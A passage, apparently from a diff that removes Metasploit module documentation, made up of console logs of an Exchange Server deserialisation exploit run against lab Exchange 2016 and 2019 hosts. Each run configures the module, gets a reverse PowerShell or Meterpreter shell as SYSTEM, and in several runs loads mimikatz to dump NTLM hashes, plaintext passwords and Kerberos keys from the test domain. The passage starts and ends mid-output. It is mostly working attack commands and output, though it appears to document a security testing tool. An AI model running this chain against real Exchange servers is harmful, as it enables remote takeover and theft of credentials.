-                                  a318e3843980454    a998f965b0d9b996b  2d5c4c8e546ba87
-                                                     55d560
-EXCHG-2016$       TESTINGDOMAIN2  f03d9a521cfd7eed6  ab32f2765ba2a3a3c
-                                  51c0ce1b0298d82    914aa472be639b241
-                                                     21e69c
-HealthMailbox2e9  TESTINGDOMAIN2  c1ab4c2b030aa3759  363c5d7a09080cd07  4e9729bc7336ca551
-0d89                              a4790cf6c78c642    d85c7ebacafd4ccb4  0624e08feaef9eb
-                                                     70c944
-
-ssp credentials
-===============
-
-Username                      Domain  Password
--------                      ------  --------
-HealthMailbox2e90d89fe61a419  (null)  LWjz0zSYg$YiYf2r{e-24zpAr)4@.u)Iq)h!49{6w(i_/_-3^%{
-ba6c0942480b9c30e@testingdom          K-Tpaf#d]Xefo.z}9.g6Qk(Ba@J&V)wH2h!X4a:eWO}_}ynh3n;
-ain.internal                          G81r@gX$q9RGGFa7s@$B3IdYxz
-
-wdigest credentials
-===================
-
-Username              Domain          Password
--------              ------          --------
-(null)                (null)          (null)
-Administrator         TESTINGDOMAIN2  (null)
-EXCHG-2016$           TESTINGDOMAIN2  (null)
-HealthMailbox2e90d89  TESTINGDOMAIN2  (null)
-
-kerberos credentials
-====================
-
-Username              Domain                  Password
--------              ------                  --------
-(null)                (null)                  (null)
-Administrator         TESTINGDOMAIN.INTERNAL  (null)
-EXCHG-2016$           testingdomain.internal  ae 82 5d 5c e8 3a aa 57 91 23 b2 83 bb 27 6
-                                              1 43 ad d1 16 58 40 5f b8 0c 54 fa e8 42 6c
-                                               a8 57 23 9b 75 7d 33 a4 09 16 c1 f1 34 37
-                                              fc ec 10 b7 bd 41 03 45 c0 0c d4 26 91 8b e
-                                              4 d5 c7 43 98 be 91 80 fa fd ff 85 98 1b 49
-                                               82 c2 26 29 00 29 4e eb c2 e5 53 5f 09 f1
-                                              75 4b 3e 6d f0 ce 9a 4c b4 6e 60 c0 8f 2a d
-                                              e e0 31 df 2b a9 6a e7 e3 8a b7 3c 90 5a 9d
-                                               bc 39 6d 52 1a 3b 99 0a 10 b9 e0 fe b4 47
-                                              5e 46 af dc 32 70 43 aa dc 7f 74 67 5d 98 f
-                                              9 d6 b1 31 b8 00 5b 07 19 7f 84 d5 1d 71 2c
-                                               3c c6 ea 72 13 86 fe a7 8b 1b 1d 77 7c 62
-                                              d7 83 e7 d1 94 02 e8 3a 0c c1 c5 9b 47 19 f
-                                              b a8 21 69 47 d4 77 67 e2 30 9f 03 f8 23 3c
-                                               94 c6 68 32 15 1c 8f 94 2e 44 f7 3b 9e 69
-                                              ac 87 4f 5f 51 9a 21 d2 df b6 84 d6 93 21 f
-                                              7 f3 0c 27 df 31 5d 33 e3 32 e9
-HealthMailbox2e90d89  TESTINGDOMAIN.INTERNAL  (null)
-exchg-2016$           TESTINGDOMAIN.INTERNAL  (null)
-
-
-meterpreter > 
-```
-
-#### Target 2 - PowerShell Stager
-```
-msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce 
-[*] Using configured payload cmd/windows/powershell_reverse_tcp
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOSTS 172.24.104.104
-RHOSTS => 172.24.104.104
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
-HttpUsername => administrator
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
-HttpPassword => thePassword123!
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.24.97.166 
-LHOST => 172.24.97.166
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set target 2
-target => 2
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
-
-Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
-
-   Name          Current Setting  Required  Description
-   ----          ---------------  --------  -----------
-   HttpPassword  thePassword123!  yes       The password to use to authenticate to the Ex
-                                            change server
-   HttpUsername  administrator    yes       The username to log into the Exchange server
-                                            as
-   Proxies                        no        A proxy chain of format type:host:port[,type:
-                                            host:port][...]
-   RHOSTS        172.24.104.104   yes       The target host(s), see https://github.com/ra
-                                            pid7/metasploit-framework/wiki/Using-Metasplo
-                                            it
-   RPORT         443              yes       The target port (TCP)
-   SRVHOST       0.0.0.0          yes       The local host or network interface to listen
-                                             on. This must be an address on the local mac
-                                            hine or 0.0.0.0 to listen on all addresses.
-   SRVPORT       8080             yes       The local port to listen on.
-   SSL           true             no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                        no        Path to a custom SSL certificate (default is
-                                            randomly generated)
-   TARGETURI     /                yes       Base path
-   URIPATH                        no        The URI to use for this exploit (default is r
-                                            andom)
-   VHOST                          no        HTTP server virtual host
-
-
-Payload options (windows/x64/meterpreter/reverse_https):
-
-   Name      Current Setting  Required  Description
-   ----      ---------------  --------  -----------
-   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, proces
-                                        s, none)
-   LHOST     172.24.97.166    yes       The local listener hostname
-   LPORT     4444             yes       The local listener port
-   LURI                       no        The HTTP Path
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   2   PowerShell Stager
-
-
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
-
-[*] Started HTTPS reverse handler on https://172.24.97.166:4444
-[*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Exchange Server 15.1.2375.7 is a vulnerable build.
-[*] Getting the user's inbox folder's ID and ChangeKey ID...
-[+] ChangeKey value for Inbox folder is AQAAABYAAABjPvjo3ZQTRrRX7vZy33WTAAAADs76
-[+] ID value for Inbox folder is AQMkADM5MTA3MzQ3LTQyZjYtNGQyMy05YTdjLWY1ZWQwNDZmZDgwNQAuAAADkwyiNLXBI0qL2/WrTMzfsQEAYz746N2UE0a0V+72ct91kwAAAgEMAAAA
-[*] Deleting the user configuration object associated with Inbox folder...
-[+] Successfully deleted the user configuration object associated with the Inbox folder!
-[*] Creating the malicious user configuration object on the Inbox folder!
-[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
-[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
-[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: jobjtqox) Without a database connected that payload UUID tracking will not work!
-[*] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: jobjtqox) Staging x64 payload (201308 bytes) ...
-[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: jobjtqox) Without a database connected that payload UUID tracking will not work!
-[*] Meterpreter session 3 opened (172.24.97.166:4444 -> 127.0.0.1 ) at 2022-02-22 17:37:56 -0600
-
-meterpreter > getuid
-Server username: NT AUTHORITY\SYSTEM
-meterpreter > load kiwi
-Loading extension kiwi...
-  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
- .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
- ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
- ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
- '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
-  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
-
-Success.
-meterpreter > creds_all
-[+] Running as SYSTEM
-[*] Retrieving all credentials
-msv credentials
-===============
-
-Username          Domain          NTLM               SHA1               DPAPI
--------          ------          ----               ----               -----
-Administrator     TESTINGDOMAIN2  373b765d01cd8aefe  220cface685ef2b97  968811261fcbaff0d
-                                  a318e3843980454    a998f965b0d9b996b  2d5c4c8e546ba87
-                                                     55d560
-EXCHG-2016$       TESTINGDOMAIN2  f03d9a521cfd7eed6  ab32f2765ba2a3a3c
-                                  51c0ce1b0298d82    914aa472be639b241
-                                                     21e69c
-HealthMailbox2e9  TESTINGDOMAIN2  c1ab4c2b030aa3759  363c5d7a09080cd07  4e9729bc7336ca551
-0d89                              a4790cf6c78c642    d85c7ebacafd4ccb4  0624e08feaef9eb
-                                                     70c944
-
-ssp credentials
-===============
-
-Username                      Domain  Password
--------                      ------  --------
-HealthMailbox2e90d89fe61a419  (null)  LWjz0zSYg$YiYf2r{e-24zpAr)4@.u)Iq)h!49{6w(i_/_-3^%{
-ba6c0942480b9c30e@testingdom          K-Tpaf#d]Xefo.z}9.g6Qk(Ba@J&V)wH2h!X4a:eWO}_}ynh3n;
-ain.internal                          G81r@gX$q9RGGFa7s@$B3IdYxz
-
-wdigest credentials
-===================
-
-Username              Domain          Password
--------              ------          --------
-(null)                (null)          (null)
-Administrator         TESTINGDOMAIN2  (null)
-EXCHG-2016$           TESTINGDOMAIN2  (null)
-HealthMailbox2e90d89  TESTINGDOMAIN2  (null)
-
-kerberos credentials
-====================
-
-Username              Domain                  Password
--------              ------                  --------
-(null)                (null)                  (null)
-Administrator         TESTINGDOMAIN.INTERNAL  (null)
-EXCHG-2016$           testingdomain.internal  ae 82 5d 5c e8 3a aa 57 91 23 b2 83 bb 27 6
-                                              1 43 ad d1 16 58 40 5f b8 0c 54 fa e8 42 6c
-                                               a8 57 23 9b 75 7d 33 a4 09 16 c1 f1 34 37
-                                              fc ec 10 b7 bd 41 03 45 c0 0c d4 26 91 8b e
-                                              4 d5 c7 43 98 be 91 80 fa fd ff 85 98 1b 49
-                                               82 c2 26 29 00 29 4e eb c2 e5 53 5f 09 f1
-                                              75 4b 3e 6d f0 ce 9a 4c b4 6e 60 c0 8f 2a d
-                                              e e0 31 df 2b a9 6a e7 e3 8a b7 3c 90 5a 9d
-                                               bc 39 6d 52 1a 3b 99 0a 10 b9 e0 fe b4 47
-                                              5e 46 af dc 32 70 43 aa dc 7f 74 67 5d 98 f
-                                              9 d6 b1 31 b8 00 5b 07 19 7f 84 d5 1d 71 2c
-                                               3c c6 ea 72 13 86 fe a7 8b 1b 1d 77 7c 62
-                                              d7 83 e7 d1 94 02 e8 3a 0c c1 c5 9b 47 19 f
-                                              b a8 21 69 47 d4 77 67 e2 30 9f 03 f8 23 3c
-                                               94 c6 68 32 15 1c 8f 94 2e 44 f7 3b 9e 69
-                                              ac 87 4f 5f 51 9a 21 d2 df b6 84 d6 93 21 f
-                                              7 f3 0c 27 df 31 5d 33 e3 32 e9
-HealthMailbox2e90d89  TESTINGDOMAIN.INTERNAL  (null)
-exchg-2016$           TESTINGDOMAIN.INTERNAL  (null)
-
-
-meterpreter > 
-```
-
-### Exchange Server 2019 CU11 SU0 on Windows Server 2019 Fully Updated with February 2022 Patches
-
-#### Target 0 - Windows Command
-```
-msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
-[*] Using configured payload cmd/windows/powershell_reverse_tcp
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOST 172.31.160.218
-RHOST => 172.31.160.218
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.31.171.42
-LHOST => 172.31.171.42
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
-HttpUsername => administrator
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
-HttpPassword => thePassword123!
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
-
-Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
-
-   Name          Current Setting  Required  Description
-   ----          ---------------  --------  -----------
-   HttpPassword  thePassword123!  yes       The password to use to authenticate to the Ex
-                                            change server
-   HttpUsername  administrator    yes       The username to log into the Exchange server
-                                            as
-   Proxies                        no        A proxy chain of format type:host:port[,type:
-                                            host:port][...]
-   RHOSTS        172.31.160.218   yes       The target host(s), see https://github.com/ra
-                                            pid7/metasploit-framework/wiki/Using-Metasplo
-                                            it
-   RPORT         443              yes       The target port (TCP)
-   SRVHOST       0.0.0.0          yes       The local host or network interface to listen
-                                             on. This must be an address on the local mac
-                                            hine or 0.0.0.0 to listen on all addresses.
-   SRVPORT       8080             yes       The local port to listen on.
-   SSL           true             no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                        no        Path to a custom SSL certificate (default is
-                                            randomly generated)
-   TARGETURI     /                yes       Base path
-   URIPATH                        no        The URI to use for this exploit (default is r
-                                            andom)
-   VHOST                          no        HTTP server virtual host
-
-
-Payload options (cmd/windows/powershell_reverse_tcp):
-
-   Name          Current Setting  Required  Description
-   ----          ---------------  --------  -----------
-   LHOST         172.31.171.42    yes       The listen address (an interface may be speci
-                                            fied)
-   LOAD_MODULES                   no        A list of powershell modules separated by a c
-                                            omma to download over the web
-   LPORT         4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   Windows Command
-
-
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
-
-[*] Started reverse TCP handler on 172.31.171.42:4444
-[*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Exchange Server 15.2.986.5 is a vulnerable build.
-[*] Getting the user's inbox folder's ID and ChangeKey ID...
-[+] ChangeKey value for Inbox folder is AQAAABYAAAD+NAPdfxHOQog5PRD09yZZAAADvk7f
-[+] ID value for Inbox folder is AQMkADk4Nzg3MTk4LTdmMWItNDIwOC1hNjYAZC1hMDU4ZWYyMGEyNDYALgAAA63xDZKmFz1AgDziIaoT/0sBAP40A91/Ec5CiDk9EPT3JlkAAAIBDAAAAA==
-[*] Deleting the user configuration object associated with Inbox folder...
-[+] Successfully deleted the user configuration object associated with the Inbox folder!
-[*] Creating the malicious user configuration object on the Inbox folder!
-[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
-[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
-[*] Powershell session session 1 opened (172.31.171.42:4444 -> 172.31.160.218:30212 ) at 2022-02-14 18:01:56 -0600
-
-PS C:\windows\system32\inetsrv> whoami
-nt authority\system
-PS C:\windows\system32\inetsrv> exit
-
-[*] 172.31.160.218 - Powershell session session 1 closed.  Reason: User exit
-```
-
-#### Target 1 - Windows Dropper
-```
-msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
-[*] Using configured payload cmd/windows/powershell_reverse_tcp
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOST 172.31.160.218
-RHOST => 172.31.160.218
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.31.171.42
-LHOST => 172.31.171.42
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
-HttpUsername => administrator
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
-HttpPassword => thePassword123!
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set TARGET 1
-TARGET => 1
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
-
-Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
-
-   Name          Current Setting  Required  Description
-   ----          ---------------  --------  -----------
-   HttpPassword  thePassword123!  yes       The password to use to authenticate to the Ex
-                                            change server
-   HttpUsername  administrator    yes       The username to log into the Exchange server
-                                            as
-   Proxies                        no        A proxy chain of format type:host:port[,type:
-                                            host:port][...]
-   RHOSTS        172.31.160.218   yes       The target host(s), see https://github.com/ra
-                                            pid7/metasploit-framework/wiki/Using-Metasplo
-                                            it
-   RPORT         443              yes       The target port (TCP)
-   SRVHOST       0.0.0.0          yes       The local host or network interface to listen
-                                             on. This must be an address on the local mac
-                                            hine or 0.0.0.0 to listen on all addresses.
-   SRVPORT       8080             yes       The local port to listen on.
-   SSL           true             no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                        no        Path to a custom SSL certificate (default is
-                                            randomly generated)
-   TARGETURI     /                yes       Base path
-   URIPATH                        no        The URI to use for this exploit (default is r
-                                            andom)
-   VHOST                          no        HTTP server virtual host
-
-
-Payload options (windows/x64/meterpreter_reverse_https):
-
-   Name        Current Setting  Required  Description
-   ----        ---------------  --------  -----------
-   EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, proc
-                                          ess, none)
-   EXTENSIONS                   no        Comma-separate list of extensions to load
-   EXTINIT                      no        Initialization strings for extensions
-   LHOST       172.31.171.42    yes       The local listener hostname
-   LPORT       4444             yes       The local listener port
-   LURI                         no        The HTTP Path
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   1   Windows Dropper
-
-
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
-
-[*] Started HTTPS reverse handler on https://172.31.171.42:4444
-[*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Exchange Server 15.2.986.5 is a vulnerable build.
-[*] Using URL: http://0.0.0.0:8080/QULKk6
-[*] Local IP: http://172.31.171.42:8080/QULKk6
-[*] Getting the user's inbox folder's ID and ChangeKey ID...
-[+] ChangeKey value for Inbox folder is AQAAABYAAAD+NAPdfxHOQog5PRD09yZZAAADvk7o
-[+] ID value for Inbox folder is AQMkADk4Nzg3MTk4LTdmMWItNDIwOC1hNjYAZC1hMDU4ZWYyMGEyNDYALgAAA63xDZKmFz1AgDziIaoT/0sBAP40A91/Ec5CiDk9EPT3JlkAAAIBDAAAAA==
-[*] Deleting the user configuration object associated with Inbox folder...
-[+] Successfully deleted the user configuration object associated with the Inbox folder!
-[*] Creating the malicious user configuration object on the Inbox folder!
-[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
-[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
-[*] Client 172.31.160.218 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.2268) requested /QULKk6
-[*] Sending payload to 172.31.160.218 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.2268)
-[*] Command Stager progress - 100.00% done (145/145 bytes)
-[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Without a database connected that payload UUID tracking will not work!
-[*] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Redirecting stageless connection from /LLPgD_mj7kz9ZPxmn24Q9Qv80ANZ8PU38jaMQ3JCPiwWGPz3Gm6fNlGNzXZ9e_8y5xxnpC6a-JVHNcPmhyMpFnMCwvLNQeZRvnB9 with UA 'Mozilla/5.0 (iPad; CPU OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1'
-[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Without a database connected that payload UUID tracking will not work!
-[*] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Attaching orphaned/stageless session...
-[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Without a database connected that payload UUID tracking will not work!
-[*] Meterpreter session 2 opened (172.31.171.42:4444 -> 127.0.0.1 ) at 2022-02-14 18:02:25 -0600
-[*] Server stopped.
-
-meterpreter > getuid
-Server username: NT AUTHORITY\SYSTEM
-meterpreter > load kiwi
-Loading extension kiwi...
-  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
- .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
- ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
- ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
- '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
-  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
-
-Success.
-meterpreter > creds_all
-[+] Running as SYSTEM
-[*] Retrieving all credentials
-msv credentials
-===============
-
-Username          Domain         NTLM               SHA1               DPAPI
--------          ------         ----               ----               -----
-Administrator     TESTINGDOMAIN  373b765d01cd8aefe  220cface685ef2b97  c5c54fb2b86a1a4a85
-                                 a318e3843980454    a998f965b0d9b996b  e6b23ad360777e
-                                                    55d560
-DC1$              TESTINGDOMAIN  bc7047881521a2844  1489def7ac6e5dd8e
-                                 573cd9b08cb33ed    ebf9d421549375da8
-                                                    9bef2d
-HealthMailbox25a  TESTINGDOMAIN  c9cd8580d9a519f7d  f5a89bd625da37ca3  c0f96c3c13864ffe1f
-d078                             3fe3b47e4e55f21    e9de89be8bba67e1b  6b62f2d0811bb1
-                                                    7d509b
-
-ssp credentials
-===============
-
-Username                      Domain  Password
--------                      ------  --------
-HealthMailbox25ad0782aada405  (null)  5sYVnq4G=D1UacRrD(I-.hf&wQRe4DN_xn8I=G#JrD?B)-MWU$f
-eaaa7287c8c514daf@testingdom          >)Ojhaah_2a]9cuP)&YR_)71BnJ=@Tdhw8C^{RJ[(^Z;Z-X}F9o
-ain.internal                          OeVGtzP=qPZ@9xT-uR)niraV42
-
-wdigest credentials
-===================
-
-Username              Domain         Password
--------              ------         --------
-(null)                (null)         (null)
-Administrator         TESTINGDOMAIN  (null)
-DC1$                  TESTINGDOMAIN  (null)
-HealthMailbox25ad078  TESTINGDOMAIN  (null)
-
-kerberos credentials
-====================
-
-Username              Domain                  Password
--------              ------                  --------
-(null)                (null)                  (null)
-Administrator         TESTINGDOMAIN.INTERNAL  (null)
-DC1$                  testingdomain.internal  4d ce f7 a8 f4 e9 57 3e f2 7d fa 08 fd 44 7
-                                              2 d1 9d d2 7b ce 0c fd 86 cb 7c 6c a8 26 50
-                                               ea 21 c6 f2 b1 63 a8 67 ab 2f ac d8 0e b0
-                                              33 02 b1 6c f6 4f f6 3d 9d f1 55 e3 ee ef 0
-                                              8 d3 a9 96 e0 e4 d2 a2 1f 50 b0 8d 70 00 e6
-                                               88 1b a4 63 27 bf ed 60 3e 57 12 b2 25 ec
-                                              b7 52 4f 01 e7 3c 93 0a ea 48 e5 2c 6d 18 7
-                                              3 80 c3 5f 2e cd 81 93 4e 81 52 32 e2 49 8e
-                                               61 63 ac 5e 72 59 f3 40 d5 be 2a cd ba a2
-                                              e4 f7 08 a6 af 1c 10 4f 79 4c 62 60 84 ad 6
-                                              6 9f 29 ae 03 2c b0 83 44 be 4b e8 64 1d 29
-                                               9b 8f 77 2c 92 5c 80 ca 93 d6 7c fe 1f 6b
-                                              f6 48 52 22 62 14 ba ea 4b 7a 2b 69 98 60 4
-                                              6 43 8e 1f 22 87 a8 57 35 06 9e 6e 83 f1 9e
-                                               25 01 34 55 eb 93 a8 f9 65 ab 56 9e 7b b8
-                                              83 86 63 b4 e2 0a e9 a7 cb a0 34 89 35 72 a
-                                              a 3b f2 df ea c1 f6 77 a6 bb cb
-HealthMailbox25ad078  TESTINGDOMAIN.INTERNAL  (null)
-dc1$                  TESTINGDOMAIN.INTERNAL  (null)
-
-
-meterpreter > exit
-[*] Shutting down Meterpreter...
-
-[*] 172.31.160.218 - Meterpreter session 2 closed.  Reason: User exit
-```
-#### Target 2 - PowerShell Stager
-```
-msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
-[*] Using configured payload cmd/windows/powershell_reverse_tcp
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOST 172.31.160.218
-RHOST => 172.31.160.218
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.31.171.42
-LHOST => 172.31.171.42
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
-HttpUsername => administrator
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
-HttpPassword => thePassword123!
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set target 2
-target => 2
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
-
-Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
-
-   Name          Current Setting  Required  Description
-   ----          ---------------  --------  -----------
-   HttpPassword  thePassword123!  yes       The password to use to authenticate to the Ex
-                                            change server
-   HttpUsername  administrator    yes       The username to log into the Exchange server
-                                            as
-   Proxies                        no        A proxy chain of format type:host:port[,type:
-                                            host:port][...]
-   RHOSTS        172.31.160.218   yes       The target host(s), see https://github.com/ra
-                                            pid7/metasploit-framework/wiki/Using-Metasplo
-                                            it
-   RPORT         443              yes       The target port (TCP)
-   SRVHOST       0.0.0.0          yes       The local host or network interface to listen
-                                             on. This must be an address on the local mac
-                                            hine or 0.0.0.0 to listen on all addresses.
-   SRVPORT       8080             yes       The local port to listen on.
-   SSL           true             no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                        no        Path to a custom SSL certificate (default is
-                                            randomly generated)
-   TARGETURI     /                yes       Base path
-   URIPATH                        no        The URI to use for this exploit (default is r
-                                            andom)
-   VHOST                          no        HTTP server virtual host
-
-
-Payload options (windows/x64/meterpreter/reverse_https):
-
-   Name      Current Setting  Required  Description
-   ----      ---------------  --------  -----------
-   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, proces
-                                        s, none)
-   LHOST     172.31.171.42    yes       The local listener hostname
-   LPORT     4444             yes       The local listener port
-   LURI                       no        The HTTP Path
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   2   PowerShell Stager
-
-
-msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
-
-[*] Started HTTPS reverse handler on https://172.31.171.42:4444
-[*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Exchange Server 15.2.986.5 is a vulnerable build.
-[*] Getting the user's inbox folder's ID and ChangeKey ID...
-[+] ChangeKey value for Inbox folder is AQAAABYAAAD+NAPdfxHOQog5PRD09yZZAAADvk7x
-[+] ID value for Inbox folder is AQMkADk4Nzg3MTk4LTdmMWItNDIwOC1hNjYAZC1hMDU4ZWYyMGEyNDYALgAAA63xDZKmFz1AgDziIaoT/0sBAP40A91/Ec5CiDk9EPT3JlkAAAIBDAAAAA==
-[*] Deleting the user configuration object associated with Inbox folder...
-[+] Successfully deleted the user configuration object associated with the Inbox folder!
-[*] Creating the malicious user configuration object on the Inbox folder!
-[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
-[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
-[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: urrkmn2k) Without a database connected that payload UUID tracking will not work!
-[*] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: urrkmn2k) Staging x64 payload (201308 bytes) ...
-[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: urrkmn2k) Without a database connected that payload UUID tracking will not work!
-[*] Meterpreter session 3 opened (172.31.171.42:4444 -> 127.0.0.1 ) at 2022-02-14 18:03:03 -0600
-
-meterpreter > getuid
-Server username: NT AUTHORITY\SYSTEM
-meterpreter > load kiwi
-Loading extension kiwi...
-  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
- .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
- ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
- ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
- '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
-  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
-
-Success.
-meterpreter > creds_all
-[+] Running as SYSTEM
-[*] Retrieving all credentials
-msv credentials
-===============
-
-Username          Domain         NTLM               SHA1               DPAPI
--------          ------         ----               ----               -----
-Administrator     TESTINGDOMAIN  373b765d01cd8aefe  220cface685ef2b97  c5c54fb2b86a1a4a85
-                                 a318e3843980454    a998f965b0d9b996b  e6b23ad360777e
-                                                    55d560
-DC1$              TESTINGDOMAIN  bc7047881521a2844  1489def7ac6e5dd8e
-                                 573cd9b08cb33ed    ebf9d421549375da8
-                                                    9bef2d
-HealthMailbox25a  TESTINGDOMAIN  c9cd8580d9a519f7d  f5a89bd625da37ca3  c0f96c3c13864ffe1f
-d078                             3fe3b47e4e55f21    e9de89be8bba67e1b  6b62f2d0811bb1
-                                                    7d509b
-
-ssp credentials
-===============
-
-Username                      Domain  Password
--------                      ------  --------
-HealthMailbox25ad0782aada405  (null)  5sYVnq4G=D1UacRrD(I-.hf&wQRe4DN_xn8I=G#JrD?B)-MWU$f
-eaaa7287c8c514daf@testingdom          >)Ojhaah_2a]9cuP)&YR_)71BnJ=@Tdhw8C^{RJ[(^Z;Z-X}F9o
-ain.internal                          OeVGtzP=qPZ@9xT-uR)niraV42
-
-wdigest credentials
-===================
-
-Username              Domain         Password
--------              ------         --------
-(null)                (null)         (null)
-Administrator         TESTINGDOMAIN  (null)
-DC1$                  TESTINGDOMAIN  (null)
-HealthMailbox25ad078  TESTINGDOMAIN  (null)
-
-kerberos credentials
-====================
-
-Username              Domain                  Password
--------              ------                  --------
-(null)                (null)                  (null)
-Administrator         TESTINGDOMAIN.INTERNAL  (null)
-DC1$                  testingdomain.internal  4d ce f7 a8 f4 e9 57 3e f2 7d fa 08 fd 44 7
-                                              2 d1 9d d2 7b ce 0c fd 86 cb 7c 6c a8 26 50
-                                               ea 21 c6 f2 b1 63 a8 67 ab 2f ac d8 0e b0
-                                              33 02 b1 6c f6 4f f6 3d 9d f1 55 e3 ee ef 0
-                                              8 d3 a9 96 e0 e4 d2 a2 1f 50 b0 8d 70 00 e6
-                                               88 1b a4 63 27 bf ed 60 3e 57 12 b2 25 ec
-                                              b7 52 4f 01 e7 3c 93 0a ea 48 e5 2c 6d 18 7
